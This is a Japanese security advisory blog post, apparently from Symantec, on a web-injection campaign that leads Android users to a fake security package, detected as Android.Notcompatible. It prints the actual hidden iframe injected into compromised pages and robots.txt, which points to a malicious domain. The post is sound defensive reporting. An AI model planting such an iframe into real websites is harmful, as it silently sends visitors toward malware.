去る 2011 年 12 月、シマンテックは中東のサイトを狙った Web サイトインジェクション攻撃と組み合わせて使われる Android 上の脅威を初めて確認しました。これが Android.Arspam で、ハックティビズムのメッセージを配信しているサイトに Android ユーザーをリダイレクトするトロイの木馬です。
最近も、Android を狙った別の Web サイトインジェクション攻撃の存在が明らかになりましたが、今回の攻撃ではモバイルマルウェアの拡散を伴っています。マルウェアを介して自動的にアプリケーションがインストールされる典型的なドライブバイダウンロードではなく、ダウンロード後にアプリケーションのインストールをユーザーに求めるという手口です。
最初は、ソーシャルブックマークサイト上で感染したサイトの所有者から報告がありましたが、その後は感染したページの HTML 本文にリダイレクト先 URL がインジェクトされたというサイトが多数報告されています。昨年シマンテックが偽の Google セキュリティパッチとして発見した Android.Bgserv を連想させるように、トロイの木馬が偽のセキュリティパッケージとして配信されます。不明なソースからのインストールが許可されているデバイスは、この種の攻撃を受けやすい状態にあります。通常は、インストールの前に要求される許可と確認をユーザーが明示的に承認しなければならないからです。
シマンテックの調査から、今までに以下のドメインが特定されています。
Web サイトインジェクションには、以下の形式が使われます。
<iframe style="visibility: hidden; display: none; display: none;" src="[http://]gaoanalitics.info/?id=[CLSID]">; </iframe>
このインジェクションは、HTML サイトだけでなく robots.txt ファイルでも確認されているので、感染した Web サーバー上のすべてのファイルに、この iframe が追加されていることも十分に考えられます。
ペイロード自体は、理解できないほど複雑なものではありません。不明瞭化はされておらず、感染したデバイスから外部ソースにトラフィックをルーティングするための簡単なプロキシとソケットルーチンがいくつか用意されているだけです。この脅威で本当に問題になるのは、その直接的な機能ではなく、第三者の利益となるようにどんな処理を実行できるかという点にあります。シマンテックの ISTR レポートの最新版でも指摘されているように、このような脅威にはマルウェア作成者の戦略の変化が反映されています。つまり、これまでに見られたプレミアム SMS 詐欺のような「ウィンドウ破り型」の単純攻撃から、個人情報や重要データを盗み出して恐喝攻撃やクリックジャックなどに利用するという高度な手口に変わりつつあるということです。
ダウンロード後やインストール中に脅威を検出するだけの他のモバイルセキュリティ製品とは異なり、ノートン セーフウェブテクノロジを利用すれば、アプリケーションのダウンロードさえ始まらないうちにこの攻撃を遮断できます。シマンテックは現在、この脅威を Android.Notcompatible として検出しています。
BYOD(Bring Your Own Device: 個人所有デバイスの持ち込み)の導入が飛躍的に増えている現状を考えると、このような脅威はモバイルマルウェアの世界が大きく変化することを如実に表しています。これまでに感染したサイトの数は多くはありませんが、悪質なモバイルアプリケーションを拡散する目的で大規模な Web インジェクション攻撃が展開される可能性は、これで大きく高まったと言えるでしょう。
* 日本語版セキュリティレスポンスブログの RSS フィードを購読するには、http://www.symantec.com/connect/ja/item-feeds/blog/2261/feed/all/ja にアクセスしてください。